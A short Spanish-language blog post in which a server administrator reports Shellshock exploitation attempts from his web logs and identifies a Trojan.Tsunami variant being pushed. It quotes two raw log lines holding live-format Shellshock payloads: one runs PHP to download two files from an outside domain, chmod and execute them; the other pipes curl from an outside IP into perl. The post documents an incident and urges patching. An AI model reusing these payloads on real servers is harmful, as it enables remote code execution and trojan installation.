Linux Tsunami Troyano

Un intento de ataque algo mas rebuscado que los normales…bueno rebuscado tampoco. Han debido de petar alguna maquina de OVH y lo estan haciendo a toda velocidad. Lo curioso del tema es que estan intentando subir una variante del Trojan.Tsunami.


Lo intentos de conexión hacen esto …

91.121.10.36 – – [07/Apr/2015:12:30:50 +0200] «GET /admin.cgi HTTP/1.0» 404 490 «() { :;} ;echo;/usr/local/bin/php -r ‘$a = \»http://x5d.su/x/Help1\»;»$b = \»http://x5d.su/x/Help2\»;»$c = sys_get_temp_dir();»$d = \»Help1\»;»$e = \»Help2\»;»$f = \»chmod 777\»;»$g = \»file_put_contents\»;»$h = \»system\»;»$i = \»file_exists\»;»$j = \»fopen\»;»if ($i($c . \»/$d\»))»{»exit(1);»}else{»echo($c);»$g(\»$c/$d\», $j(\»$a\», \»r\»));»$g(\»$c/$e\», $j(\»$b\», \»r\»));»$h(\»$f \» . $c .\»/$d\»);»$h(\»$f \» . $c .\»/$e\»);»$h($c . \»/$d\»);»$h($c . \»/$e\»);»}'» «-»

Intentando explotar shellshock y bajar el fichero en cuestión (el troyano). Virustotal lo identifica como ese troyano.

troyano

Y asi lleva toda la mañana … por lo menos es algo mas elaborado que los tipicos …

46.109.148.56 – – [02/Apr/2015:09:06:55 +0200] «GET /cgi-bin/astrocam.cgi HTTP/1.0» 404 538 «() { :; }; curl http://54.248.244.82/test.pl | perl» «() { :; }; curl http://54.248.244.82/test.pl | perl»

En fin … que la recomendación es la de siempre … parchea … parchea y parchea…